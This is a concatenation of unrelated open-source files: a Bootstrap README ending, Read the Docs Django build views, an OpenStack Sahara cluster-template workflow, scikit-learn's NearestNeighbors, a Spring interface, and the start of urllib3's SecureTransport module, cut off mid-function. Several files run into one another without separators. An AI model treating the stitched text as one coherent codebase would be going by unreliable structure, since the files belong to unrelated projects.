You can find all our previous releases docs on <https://getbootstrap.com/docs/versions/>.
[Previous releases](https://github.com/twbs/bootstrap/releases) and their documentation are also available for download.
## Contributing
Please read through our [contributing guidelines](https://github.com/twbs/bootstrap/blob/main/.github/CONTRIBUTING.md). Included are directions for opening issues, coding standards, and notes on development.
Moreover, if your pull request contains JavaScript patches or features, you must include [relevant unit tests](https://github.com/twbs/bootstrap/tree/main/js/tests). All HTML and CSS should conform to the [Code Guide](https://github.com/mdo/code-guide), maintained by [Mark Otto](https://github.com/mdo).
Editor preferences are available in the [editor config](https://github.com/twbs/bootstrap/blob/main/.editorconfig) for easy use in common text editors. Read more and download plugins at <https://editorconfig.org/>.
## Community
Get updates on Bootstrap’s development and chat with the project maintainers and community members.
- Follow [@getbootstrap on X](https://x.com/getbootstrap).
- Read and subscribe to [The Official Bootstrap Blog](https://blog.getbootstrap.com/).
- Ask questions and explore [our GitHub Discussions](https://github.com/twbs/bootstrap/discussions).
- Discuss, ask questions, and more on [the community Discord](https://discord.gg/bZUvakRU3M) or [Bootstrap subreddit](https://www.reddit.com/r/bootstrap/).
- Chat with fellow Bootstrappers in IRC. On the `irc.libera.chat` server, in the `#bootstrap` channel.
- Implementation help may be found at Stack Overflow (tagged [`bootstrap-5`](https://stackoverflow.com/questions/tagged/bootstrap-5)).
- Developers should use the keyword `bootstrap` on packages which modify or add to the functionality of Bootstrap when distributing through [npm](https://www.npmjs.com/browse/keyword/bootstrap) or similar delivery mechanisms for maximum discoverability.
## Versioning
For transparency into our release cycle and in striving to maintain backward compatibility, Bootstrap is maintained under [the Semantic Versioning guidelines](https://semver.org/). Sometimes we screw up, but we adhere to those rules whenever possible.
See [the Releases section of our GitHub project](https://github.com/twbs/bootstrap/releases) for changelogs for each release version of Bootstrap. Release announcement posts on [the official Bootstrap blog](https://blog.getbootstrap.com/) contain summaries of the most noteworthy changes made in each release.
## Creators
**Mark Otto**
- <https://x.com/mdo>
- <https://github.com/mdo>
**Jacob Thornton**
- <https://x.com/fat>
- <https://github.com/fat>
## Thanks
<a href="https://www.browserstack.com/">
<img src="https://live.browserstack.com/images/opensource/browserstack-logo.svg" alt="BrowserStack" width="192" height="42">
</a>
Thanks to [BrowserStack](https://www.browserstack.com/) for providing the infrastructure that allows us to test in real browsers!
<a href="https://www.netlify.com/">
<img src="https://www.netlify.com/v3/img/components/full-logo-light.svg" alt="Netlify" width="147" height="40">
</a>
Thanks to [Netlify](https://www.netlify.com/) for providing us with Deploy Previews!
## Sponsors
Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [[Become a sponsor](https://opencollective.com/bootstrap#sponsor)]
[](https://opencollective.com/bootstrap/sponsor/0/website)
[](https://opencollective.com/bootstrap/sponsor/1/website)
[](https://opencollective.com/bootstrap/sponsor/2/website)
[](https://opencollective.com/bootstrap/sponsor/3/website)
[](https://opencollective.com/bootstrap/sponsor/4/website)
[](https://opencollective.com/bootstrap/sponsor/5/website)
[](https://opencollective.com/bootstrap/sponsor/6/website)
[](https://opencollective.com/bootstrap/sponsor/7/website)
[](https://opencollective.com/bootstrap/sponsor/8/website)
[](https://opencollective.com/bootstrap/sponsor/9/website)
## Backers
Thank you to all our backers! 🙏 [[Become a backer](https://opencollective.com/bootstrap#backer)]
[](https://opencollective.com/bootstrap#backers)
## Copyright and license
Code and documentation copyright 2011-2025 the [Bootstrap Authors](https://github.com/twbs/bootstrap/graphs/contributors). Code released under the [MIT License](https://github.com/twbs/bootstrap/blob/main/LICENSE). Docs released under [Creative Commons](https://creativecommons.org/licenses/by/3.0/). | unknown | github | https://github.com/twbs/bootstrap | README.md |
import logging
from django.shortcuts import get_object_or_404
from django.views.generic import ListView, DetailView
from django.http import HttpResponsePermanentRedirect
from django.conf import settings
from django.core.urlresolvers import reverse
from rest_framework.renderers import JSONRenderer
from readthedocs.builds.models import Build, Version
from readthedocs.builds.filters import BuildFilter
from readthedocs.projects.models import Project
from readthedocs.restapi.serializers import BuildSerializerFull
from redis import Redis, ConnectionError
log = logging.getLogger(__name__)
class BuildList(ListView):
    """List all builds belonging to a single project."""
    model = Build

    def get_queryset(self):
        # Resolve the project from the URL kwargs, 404ing for projects the
        # current user may not see. The project is stashed on the view
        # instance for reuse in get_context_data().
        self.project_slug = self.kwargs.get('project_slug', None)
        self.project = get_object_or_404(
            Project.objects.protected(self.request.user),
            slug=self.project_slug
        )
        return Build.objects.filter(project=self.project)

    def get_context_data(self, **kwargs):
        context = super(BuildList, self).get_context_data(**kwargs)
        build_filter = BuildFilter(self.request.GET, queryset=self.get_queryset())
        unfinished_builds = self.get_queryset().exclude(state="finished").values('id')
        context['project'] = self.project
        context['filter'] = build_filter
        context['active_builds'] = unfinished_builds
        context['versions'] = Version.objects.public(
            user=self.request.user, project=self.project)
        # Queue length is informational only: a Redis outage must not
        # break the page, so fall back to None.
        try:
            context['queue_length'] = Redis(**settings.REDIS).llen('celery')
        except ConnectionError:
            context['queue_length'] = None
        return context
class BuildDetail(DetailView):
    """Show a single build, exposing it to the template as JSON as well."""
    model = Build

    def get_queryset(self):
        # Restrict visible builds to a single, permission-checked project
        # (same scoping rule as the list view), stashing the project on
        # the view instance for get_context_data().
        self.project_slug = self.kwargs.get('project_slug', None)
        self.project = get_object_or_404(
            Project.objects.protected(self.request.user),
            slug=self.project_slug
        )
        return Build.objects.filter(project=self.project)

    def get_context_data(self, **kwargs):
        context = super(BuildDetail, self).get_context_data(**kwargs)
        context['project'] = self.project
        serializer = BuildSerializerFull(self.get_object())
        context['build_json'] = JSONRenderer().render(serializer.data)
        return context
def builds_redirect_list(request, project_slug):
    """Permanently redirect a legacy build-list URL to the current one."""
    target = reverse('builds_project_list', args=[project_slug])
    return HttpResponsePermanentRedirect(target)
def builds_redirect_detail(request, project_slug, pk):
    """Permanently redirect a legacy build-detail URL to the current one.

    :param project_slug: slug of the project that owns the build
    :param pk: primary key of the build being viewed
    """
    # Fix: stray dataset-residue text fused onto the original return line
    # made the module syntactically invalid; the redirect itself is unchanged.
    return HttpResponsePermanentRedirect(
        reverse('builds_detail', args=[project_slug, pk]))
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
import logging
from django.utils.translation import ugettext_lazy as _
from saharaclient.api import base as api_base
from horizon import exceptions
from horizon import forms
from horizon import workflows
from openstack_dashboard.contrib.sahara.api import sahara as saharaclient
from openstack_dashboard.contrib.sahara.content.data_processing. \
utils import helpers as helpers
from openstack_dashboard.contrib.sahara.content.data_processing. \
utils import anti_affinity as aa
import openstack_dashboard.contrib.sahara.content.data_processing. \
utils.workflow_helpers as whelpers
LOG = logging.getLogger(__name__)
class SelectPluginAction(workflows.Action):
    """First workflow step: choose a Sahara plugin and Hadoop version.

    Fields are built dynamically from the plugin list returned by the
    Sahara API: one "plugin_name" choice plus one "<plugin>_version"
    choice per available plugin.
    """
    # Hidden marker read by the frontend; presumably flags the "create"
    # flavour of this form — confirm against the page JS.
    hidden_create_field = forms.CharField(
        required=False,
        widget=forms.HiddenInput(attrs={"class": "hidden_create_field"}))

    def __init__(self, request, *args, **kwargs):
        super(SelectPluginAction, self).__init__(request, *args, **kwargs)
        try:
            plugins = saharaclient.plugin_list(request)
        except Exception:
            # Degrade gracefully: empty choice list, error surfaced via
            # Horizon's standard exception handler.
            plugins = []
            exceptions.handle(request,
                              _("Unable to fetch plugin list."))
        plugin_choices = [(plugin.name, plugin.title) for plugin in plugins]
        self.fields["plugin_name"] = forms.ChoiceField(
            label=_("Plugin name"),
            choices=plugin_choices,
            widget=forms.Select(attrs={"class": "plugin_name_choice"}))

        # One version dropdown per plugin; the CSS classes set below are
        # presumably used client-side to show only the dropdown matching
        # the selected plugin — confirm in the template JS.
        for plugin in plugins:
            field_name = plugin.name + "_version"
            choice_field = forms.ChoiceField(
                label=_("Version"),
                choices=[(version, version) for version in plugin.versions],
                widget=forms.Select(
                    attrs={"class": "plugin_version_choice "
                           + field_name + "_choice"})
            )
            self.fields[field_name] = choice_field

    class Meta(object):
        name = _("Select plugin and hadoop version for cluster template")
        help_text_template = ("project/data_processing.cluster_templates/"
                              "_create_general_help.html")
class SelectPlugin(workflows.Step):
    # Thin Step wrapper that binds SelectPluginAction into a workflow.
    action_class = SelectPluginAction
class CreateClusterTemplate(workflows.Workflow):
    """Initial workflow containing only the plugin/version selection step.

    The finalize button is labeled "Next", i.e. this stage collects the
    selection rather than creating anything itself.
    """
    slug = "create_cluster_template"
    name = _("Create Cluster Template")
    finalize_button_name = _("Next")
    success_message = _("Created")
    failure_message = _("Could not create")
    success_url = "horizon:project:data_processing.cluster_templates:index"
    default_steps = (SelectPlugin,)
class GeneralConfigAction(workflows.Action):
    """Collects the general (non node-group) cluster-template details.

    The plugin name and Hadoop version chosen in the SelectPlugin step are
    carried through as hidden fields added in __init__.
    """
    # Hidden markers read by the frontend to drive the configure flow.
    hidden_configure_field = forms.CharField(
        required=False,
        widget=forms.HiddenInput(attrs={"class": "hidden_configure_field"}))
    hidden_to_delete_field = forms.CharField(
        required=False,
        widget=forms.HiddenInput(attrs={"class": "hidden_to_delete_field"}))
    cluster_template_name = forms.CharField(label=_("Template Name"))
    description = forms.CharField(label=_("Description"),
                                  required=False,
                                  widget=forms.Textarea(attrs={'rows': 4}))
    use_autoconfig = forms.BooleanField(
        label=_("Auto-configure"),
        help_text=_("If selected, instances of a cluster will be "
                    "automatically configured during creation. Otherwise you "
                    "should manually specify configuration values"),
        required=False,
        widget=forms.CheckboxInput(),
        initial=True,
    )
    anti_affinity = aa.anti_affinity_field()

    def __init__(self, request, *args, **kwargs):
        super(GeneralConfigAction, self).__init__(request, *args, **kwargs)
        # Inject the earlier plugin/version selection as hidden fields so
        # it survives this form's round-trip.
        plugin, hadoop_version = whelpers.\
            get_plugin_and_hadoop_version(request)
        self.fields["plugin_name"] = forms.CharField(
            widget=forms.HiddenInput(),
            initial=plugin
        )
        self.fields["hadoop_version"] = forms.CharField(
            widget=forms.HiddenInput(),
            initial=hadoop_version
        )

    # Bound as a method; implementation lives in utils.anti_affinity.
    populate_anti_affinity_choices = aa.populate_anti_affinity_choices

    def get_help_text(self):
        # Expose plugin/version to the help-text template below.
        extra = dict()
        plugin, hadoop_version = whelpers\
            .get_plugin_and_hadoop_version(self.request)
        extra["plugin_name"] = plugin
        extra["hadoop_version"] = hadoop_version
        return super(GeneralConfigAction, self).get_help_text(extra)

    def clean(self):
        cleaned_data = super(GeneralConfigAction, self).clean()
        # When the submit is the intermediate "create_nodegroup" round-trip
        # (not a final create), discard validation errors.
        if cleaned_data.get("hidden_configure_field", None) \
                == "create_nodegroup":
            self._errors = dict()
        return cleaned_data

    class Meta(object):
        name = _("Details")
        help_text_template = ("project/data_processing.cluster_templates/"
                              "_configure_general_help.html")
class GeneralConfig(workflows.Step):
    """Workflow step exposing the general cluster-template details."""
    action_class = GeneralConfigAction
    contributes = ("hidden_configure_field", )

    def contribute(self, data, context):
        # Namespace every form value with a "general_" prefix so later
        # steps can tell where each context entry came from.
        for key, value in data.items():
            context["general_" + key] = value
        context['anti_affinity_info'] = (
            self.workflow.request.POST.getlist("anti_affinity"))
        return context
class ConfigureNodegroupsAction(workflows.Action):
    """Workflow action that manages the template's node-group rows.

    Row ids arrive as a JSON list in ``forms_ids``; each row's values
    arrive as ``group_name_<id>`` / ``template_id_<id>`` / ``count_<id>``
    / ``serialized_<id>`` request parameters.
    """
    # Hidden marker set by the frontend on the intermediate "add
    # nodegroup" submit (see clean() below).
    hidden_nodegroups_field = forms.CharField(
        required=False,
        widget=forms.HiddenInput(attrs={"class": "hidden_nodegroups_field"}))
    forms_ids = forms.CharField(
        required=False,
        widget=forms.HiddenInput())

    def __init__(self, request, *args, **kwargs):
        super(ConfigureNodegroupsAction, self). \
            __init__(request, *args, **kwargs)
        # NOTE(review): request.REQUEST (merged GET+POST) was removed in
        # Django 1.9 — this code presumably targets an older Django.
        plugin = request.REQUEST.get("plugin_name")
        version = request.REQUEST.get("hadoop_version")
        if plugin and not version:
            # The version may still be under the per-plugin field name
            # created by SelectPluginAction ("<plugin>_version").
            version_name = plugin + "_version"
            version = request.REQUEST.get(version_name)

        # Without a plugin/version pair, fall back to listing every
        # node-group template.
        if not plugin or not version:
            self.templates = saharaclient.nodegroup_template_find(request)
        else:
            self.templates = saharaclient.nodegroup_template_find(
                request, plugin_name=plugin, hadoop_version=version)

        deletable = request.REQUEST.get("deletable", dict())

        request_source = None
        if 'forms_ids' in request.POST:
            request_source = request.POST
        elif 'forms_ids' in request.REQUEST:
            request_source = request.REQUEST
        if request_source:
            self.groups = []
            # NOTE: "id" shadows the builtin of the same name.
            for id in json.loads(request_source['forms_ids']):
                group_name = "group_name_" + str(id)
                template_id = "template_id_" + str(id)
                count = "count_" + str(id)
                serialized = "serialized_" + str(id)
                self.groups.append({"name": request_source[group_name],
                                    "template_id": request_source[template_id],
                                    "count": request_source[count],
                                    "id": id,
                                    "deletable": deletable.get(
                                        request_source[group_name], "true"),
                                    "serialized": request_source[serialized]})
                # Adds the per-row form fields to this action.
                whelpers.build_node_group_fields(self,
                                                 group_name,
                                                 template_id,
                                                 count,
                                                 serialized)

    def clean(self):
        cleaned_data = super(ConfigureNodegroupsAction, self).clean()
        # Skip validation errors on the intermediate "create_nodegroup"
        # round-trip; only the final submit should validate.
        if cleaned_data.get("hidden_nodegroups_field", None) \
                == "create_nodegroup":
            self._errors = dict()
        return cleaned_data

    class Meta(object):
        name = _("Node Groups")
class ConfigureNodegroups(workflows.Step):
    """Workflow step for assembling the template's node groups."""
    action_class = ConfigureNodegroupsAction
    contributes = ("hidden_nodegroups_field", )
    template_name = ("project/data_processing.cluster_templates/"
                     "cluster_node_groups_template.html")

    def contribute(self, data, context):
        # Copy node-group form values into the shared context under an
        # "ng_" prefix.
        context.update(("ng_" + key, value) for key, value in data.items())
        return context
class ConfigureClusterTemplate(whelpers.ServiceParametersWorkflow,
                               whelpers.StatusFormatMixin):
    """Second-stage workflow that actually creates the cluster template.

    Combines the general-details and node-group steps with dynamically
    generated plugin-configuration tabs, and on submit posts the
    assembled template to the Sahara API.
    """
    slug = "configure_cluster_template"
    name = _("Create Cluster Template")
    finalize_button_name = _("Create")
    success_message = _("Created Cluster Template %s")
    name_property = "general_cluster_template_name"
    success_url = "horizon:project:data_processing.cluster_templates:index"
    default_steps = (GeneralConfig,
                     ConfigureNodegroups)

    def __init__(self, request, context_seed, entry_point, *args, **kwargs):
        ConfigureClusterTemplate._cls_registry = set([])

        hlps = helpers.Helpers(request)
        plugin, hadoop_version = whelpers.\
            get_plugin_and_hadoop_version(request)

        # Plugin-specific configuration parameters become extra tabs.
        general_parameters = hlps.get_cluster_general_configs(
            plugin,
            hadoop_version)
        service_parameters = hlps.get_targeted_cluster_configs(
            plugin,
            hadoop_version)
        self._populate_tabs(general_parameters, service_parameters)

        super(ConfigureClusterTemplate, self).__init__(request,
                                                       context_seed,
                                                       entry_point,
                                                       *args, **kwargs)

    def is_valid(self):
        """Validate every step, recording failing field names per step."""
        steps_valid = True
        for step in self.steps:
            if not step.action.is_valid():
                steps_valid = False
                step.has_errors = True
                errors_fields = list(step.action.errors.keys())
                step.action.errors_fields = errors_fields
        if not steps_valid:
            return steps_valid
        return self.validate(self.context)

    def handle(self, request, context):
        """Create the cluster template from the collected context.

        Returns True on success; on failure returns False after recording
        the API error message (``self.error_description``) or surfacing
        the exception through Horizon's handler.
        """
        try:
            node_groups = []
            configs_dict = whelpers.parse_configs_from_context(context,
                                                               self.defaults)
            ids = json.loads(context['ng_forms_ids'])
            # NOTE: renamed from "id" to avoid shadowing the builtin.
            for form_id in ids:
                name = context['ng_group_name_' + str(form_id)]
                template_id = context['ng_template_id_' + str(form_id)]
                count = context['ng_count_' + str(form_id)]

                # A node group may arrive pre-serialized (urlsafe-base64
                # JSON) from an existing template; otherwise build it from
                # the individual form values.
                raw_ng = context.get("ng_serialized_" + str(form_id))
                if raw_ng and raw_ng != 'null':
                    ng = json.loads(base64.urlsafe_b64decode(str(raw_ng)))
                else:
                    ng = dict()
                ng["name"] = name
                ng["count"] = count
                if template_id and template_id != u'None':
                    ng["node_group_template_id"] = template_id
                node_groups.append(ng)

            plugin, hadoop_version = whelpers.\
                get_plugin_and_hadoop_version(request)

            # TODO(nkonovalov): Fix client to support default_image_id
            saharaclient.cluster_template_create(
                request,
                context["general_cluster_template_name"],
                plugin,
                hadoop_version,
                context["general_description"],
                configs_dict,
                node_groups,
                context["anti_affinity_info"],
                use_autoconfig=context['general_use_autoconfig']
            )

            hlps = helpers.Helpers(request)
            if hlps.is_from_guide():
                request.session["guide_cluster_template_name"] = (
                    context["general_cluster_template_name"])
                self.success_url = (
                    "horizon:project:data_processing.wizard:cluster_guide")
            return True
        except api_base.APIException as e:
            # API errors carry a user-presentable message; keep it.
            self.error_description = str(e)
            return False
        except Exception:
            exceptions.handle(request,
                              _("Cluster template creation failed"))
            return False
"""Unsupervised nearest neighbors learner"""
from .base import NeighborsBase
from .base import KNeighborsMixin
from .base import RadiusNeighborsMixin
from .base import UnsupervisedMixin
class NearestNeighbors(NeighborsBase, KNeighborsMixin,
                       RadiusNeighborsMixin, UnsupervisedMixin):
    """Unsupervised learner for implementing neighbor searches.

    Read more in the :ref:`User Guide <unsupervised_neighbors>`.

    Parameters
    ----------
    n_neighbors : int, optional (default = 5)
        Number of neighbors to use by default for :meth:`kneighbors` queries.

    radius : float, optional (default = 1.0)
        Range of parameter space to use by default for
        :meth:`radius_neighbors` queries.

    algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
        Algorithm used to compute the nearest neighbors:

        - 'ball_tree' will use :class:`BallTree`
        - 'kd_tree' will use :class:`KDTree`
        - 'brute' will use a brute-force search.
        - 'auto' will attempt to decide the most appropriate algorithm
          based on the values passed to :meth:`fit` method.

        Note: fitting on sparse input will override the setting of
        this parameter, using brute force.

    leaf_size : int, optional (default = 30)
        Leaf size passed to BallTree or KDTree. This can affect the
        speed of the construction and query, as well as the memory
        required to store the tree. The optimal value depends on the
        nature of the problem.

    p : integer, optional (default = 2)
        Parameter for the Minkowski metric from
        sklearn.metrics.pairwise.pairwise_distances. When p = 1, this is
        equivalent to using manhattan_distance (l1), and euclidean_distance
        (l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.

    metric : string or callable, default 'minkowski'
        metric to use for distance computation. Any metric from scikit-learn
        or scipy.spatial.distance can be used.

        If metric is a callable function, it is called on each
        pair of instances (rows) and the resulting value recorded. The callable
        should take two arrays as input and return one value indicating the
        distance between them. This works for Scipy's metrics, but is less
        efficient than passing the metric name as a string.

        Distance matrices are not supported.

        Valid values for metric are:

        - from scikit-learn: ['cityblock', 'cosine', 'euclidean', 'l1', 'l2',
          'manhattan']

        - from scipy.spatial.distance: ['braycurtis', 'canberra', 'chebyshev',
          'correlation', 'dice', 'hamming', 'jaccard', 'kulsinski',
          'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto',
          'russellrao', 'seuclidean', 'sokalmichener', 'sokalsneath',
          'sqeuclidean', 'yule']

        See the documentation for scipy.spatial.distance for details on these
        metrics.

    metric_params : dict, optional (default = None)
        Additional keyword arguments for the metric function.

    n_jobs : int, optional (default = 1)
        The number of parallel jobs to run for neighbors search.
        If ``-1``, then the number of jobs is set to the number of CPU cores.
        Affects only :meth:`kneighbors` and :meth:`kneighbors_graph` methods.

    Examples
    --------
    >>> import numpy as np
    >>> from sklearn.neighbors import NearestNeighbors
    >>> samples = [[0, 0, 2], [1, 0, 0], [0, 0, 1]]
    >>> neigh = NearestNeighbors(2, 0.4)
    >>> neigh.fit(samples) #doctest: +ELLIPSIS
    NearestNeighbors(...)
    >>> neigh.kneighbors([[0, 0, 1.3]], 2, return_distance=False)
    ... #doctest: +ELLIPSIS
    array([[2, 0]]...)
    >>> rng = neigh.radius_neighbors([0, 0, 1.3], 0.4, return_distance=False)
    >>> np.asarray(rng[0][0])
    array(2)

    See also
    --------
    KNeighborsClassifier
    RadiusNeighborsClassifier
    KNeighborsRegressor
    RadiusNeighborsRegressor
    BallTree

    Notes
    -----
    See :ref:`Nearest Neighbors <neighbors>` in the online documentation
    for a discussion of the choice of ``algorithm`` and ``leaf_size``.

    http://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
    """

    def __init__(self, n_neighbors=5, radius=1.0,
                 algorithm='auto', leaf_size=30, metric='minkowski',
                 p=2, metric_params=None, n_jobs=1, **kwargs):
        # All parameter handling is delegated to NeighborsBase._init_params;
        # this class only composes the unsupervised mixins.
        self._init_params(n_neighbors=n_neighbors,
                          radius=radius,
                          algorithm=algorithm,
                          leaf_size=leaf_size, metric=metric, p=p,
                          metric_params=metric_params, n_jobs=n_jobs, **kwargs)
/*
* Copyright 2002-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.beans.factory.xml;
import org.jspecify.annotations.Nullable;
/**
* Used by the {@link org.springframework.beans.factory.xml.DefaultBeanDefinitionDocumentReader} to
* locate a {@link NamespaceHandler} implementation for a particular namespace URI.
*
* @author Rob Harrop
* @since 2.0
* @see NamespaceHandler
* @see org.springframework.beans.factory.xml.DefaultBeanDefinitionDocumentReader
*/
@FunctionalInterface
public interface NamespaceHandlerResolver {
/**
* Resolve the namespace URI and return the located {@link NamespaceHandler}
* implementation.
* @param namespaceUri the relevant namespace URI
* @return the located {@link NamespaceHandler} (may be {@code null})
*/
@Nullable NamespaceHandler resolve(String namespaceUri);
} | java | github | https://github.com/spring-projects/spring-framework | spring-beans/src/main/java/org/springframework/beans/factory/xml/NamespaceHandlerResolver.java |
"""
SecureTranport support for urllib3 via ctypes.
This makes platform-native TLS available to urllib3 users on macOS without the
use of a compiler. This is an important feature because the Python Package
Index is moving to become a TLSv1.2-or-higher server, and the default OpenSSL
that ships with macOS is not capable of doing TLSv1.2. The only way to resolve
this is to give macOS users an alternative solution to the problem, and that
solution is to use SecureTransport.
We use ctypes here because this solution must not require a compiler. That's
because pip is not allowed to require a compiler either.
This is not intended to be a seriously long-term solution to this problem.
The hope is that PEP 543 will eventually solve this issue for us, at which
point we can retire this contrib module. But in the short term, we need to
solve the impending tire fire that is Python on Mac without this kind of
contrib module. So...here we are.
To use this module, simply import and inject it::
import urllib3.contrib.securetransport
urllib3.contrib.securetransport.inject_into_urllib3()
Happy TLSing!
"""
from __future__ import absolute_import
import contextlib
import ctypes
import errno
import os.path
import shutil
import socket
import ssl
import threading
import weakref
from .. import util
from ._securetransport.bindings import (
Security, SecurityConst, CoreFoundation
)
from ._securetransport.low_level import (
_assert_no_error, _cert_array_from_pem, _temporary_keychain,
_load_client_cert_chain
)
try: # Platform-specific: Python 2
from socket import _fileobject
except ImportError: # Platform-specific: Python 3
_fileobject = None
from ..packages.backports.makefile import backport_makefile
# Guard: this module is unusable without memoryview (needed for zero-copy
# reads in the I/O callbacks).
try:
    memoryview(b'')
except NameError:
    raise ImportError("SecureTransport only works on Pythons with memoryview")

__all__ = ['inject_into_urllib3', 'extract_from_urllib3']

# SNI always works
HAS_SNI = True

# Saved so extract_from_urllib3() can restore the original values.
orig_util_HAS_SNI = util.HAS_SNI
orig_util_SSLContext = util.ssl_.SSLContext

# This dictionary is used by the read callback to obtain a handle to the
# calling wrapped socket. This is a pretty silly approach, but for now it'll
# do. I feel like I should be able to smuggle a handle to the wrapped socket
# directly in the SSLConnectionRef, but for now this approach will work I
# guess.
#
# We need to lock around this structure for inserts, but we don't do it for
# reads/writes in the callbacks. The reasoning here goes as follows:
#
#    1. It is not possible to call into the callbacks before the dictionary is
#       populated, so once in the callback the id must be in the dictionary.
#    2. The callbacks don't mutate the dictionary, they only read from it, and
#       so cannot conflict with any of the insertions.
#
# This is good: if we had to lock in the callbacks we'd drastically slow down
# the performance of this code.
_connection_refs = weakref.WeakValueDictionary()
_connection_ref_lock = threading.Lock()

# Limit writes to 16kB. This is OpenSSL's limit, but we'll cargo-cult it over
# for no better reason than we need *a* limit, and this one is right there.
SSL_WRITE_BLOCKSIZE = 16384

# This is our equivalent of util.ssl_.DEFAULT_CIPHERS, but expanded out to
# individual cipher suites. We need to do this because this is how
# SecureTransport wants them.
CIPHER_SUITES = [
    SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,
    SecurityConst.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,
    SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,
    SecurityConst.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,
    SecurityConst.TLS_DHE_DSS_WITH_AES_256_GCM_SHA384,
    SecurityConst.TLS_DHE_RSA_WITH_AES_256_GCM_SHA384,
    SecurityConst.TLS_DHE_DSS_WITH_AES_128_GCM_SHA256,
    SecurityConst.TLS_DHE_RSA_WITH_AES_128_GCM_SHA256,
    SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384,
    SecurityConst.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384,
    SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA,
    SecurityConst.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,
    SecurityConst.TLS_DHE_RSA_WITH_AES_256_CBC_SHA256,
    SecurityConst.TLS_DHE_DSS_WITH_AES_256_CBC_SHA256,
    SecurityConst.TLS_DHE_RSA_WITH_AES_256_CBC_SHA,
    SecurityConst.TLS_DHE_DSS_WITH_AES_256_CBC_SHA,
    SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256,
    SecurityConst.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256,
    SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA,
    SecurityConst.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA,
    SecurityConst.TLS_DHE_RSA_WITH_AES_128_CBC_SHA256,
    SecurityConst.TLS_DHE_DSS_WITH_AES_128_CBC_SHA256,
    SecurityConst.TLS_DHE_RSA_WITH_AES_128_CBC_SHA,
    SecurityConst.TLS_DHE_DSS_WITH_AES_128_CBC_SHA,
    SecurityConst.TLS_RSA_WITH_AES_256_GCM_SHA384,
    SecurityConst.TLS_RSA_WITH_AES_128_GCM_SHA256,
    SecurityConst.TLS_RSA_WITH_AES_256_CBC_SHA256,
    SecurityConst.TLS_RSA_WITH_AES_128_CBC_SHA256,
    SecurityConst.TLS_RSA_WITH_AES_256_CBC_SHA,
    SecurityConst.TLS_RSA_WITH_AES_128_CBC_SHA,
]

# Basically this is simple: for PROTOCOL_SSLv23 we turn it into a low of
# TLSv1 and a high of TLSv1.2. For everything else, we pin to that version.
_protocol_to_min_max = {
    ssl.PROTOCOL_SSLv23: (SecurityConst.kTLSProtocol1, SecurityConst.kTLSProtocol12),
}

# The remaining PROTOCOL_* constants vary by Python build, so probe for
# each one before mapping it.
if hasattr(ssl, "PROTOCOL_SSLv2"):
    _protocol_to_min_max[ssl.PROTOCOL_SSLv2] = (
        SecurityConst.kSSLProtocol2, SecurityConst.kSSLProtocol2
    )
if hasattr(ssl, "PROTOCOL_SSLv3"):
    _protocol_to_min_max[ssl.PROTOCOL_SSLv3] = (
        SecurityConst.kSSLProtocol3, SecurityConst.kSSLProtocol3
    )
if hasattr(ssl, "PROTOCOL_TLSv1"):
    _protocol_to_min_max[ssl.PROTOCOL_TLSv1] = (
        SecurityConst.kTLSProtocol1, SecurityConst.kTLSProtocol1
    )
if hasattr(ssl, "PROTOCOL_TLSv1_1"):
    _protocol_to_min_max[ssl.PROTOCOL_TLSv1_1] = (
        SecurityConst.kTLSProtocol11, SecurityConst.kTLSProtocol11
    )
if hasattr(ssl, "PROTOCOL_TLSv1_2"):
    _protocol_to_min_max[ssl.PROTOCOL_TLSv1_2] = (
        SecurityConst.kTLSProtocol12, SecurityConst.kTLSProtocol12
    )
if hasattr(ssl, "PROTOCOL_TLS"):
    _protocol_to_min_max[ssl.PROTOCOL_TLS] = _protocol_to_min_max[ssl.PROTOCOL_SSLv23]
def inject_into_urllib3():
    """Monkey-patch urllib3 so its TLS goes through SecureTransport.

    Replaces urllib3's SSLContext with SecureTransportContext and flips
    the feature flags on both ``util`` and ``util.ssl_``.
    """
    for module in (util, util.ssl_):
        module.HAS_SNI = HAS_SNI
        module.IS_SECURETRANSPORT = True
    util.ssl_.SSLContext = SecureTransportContext
def extract_from_urllib3():
    """Undo the monkey-patching performed by :func:`inject_into_urllib3`."""
    for module in (util, util.ssl_):
        module.HAS_SNI = orig_util_HAS_SNI
        module.IS_SECURETRANSPORT = False
    util.ssl_.SSLContext = orig_util_SSLContext
def _read_callback(connection_id, data_buffer, data_length_pointer):
    """
    SecureTransport read callback. This is called by ST to request that data
    be returned from the socket.

    Runs on the C side of a ctypes boundary, so it must never let a Python
    exception escape: errors are reported as SecureTransport status codes,
    and the original exception is stashed on the wrapped socket for
    _raise_on_error() to re-raise.
    """
    wrapped_socket = None
    try:
        wrapped_socket = _connection_refs.get(connection_id)
        if wrapped_socket is None:
            return SecurityConst.errSSLInternal
        base_socket = wrapped_socket.socket

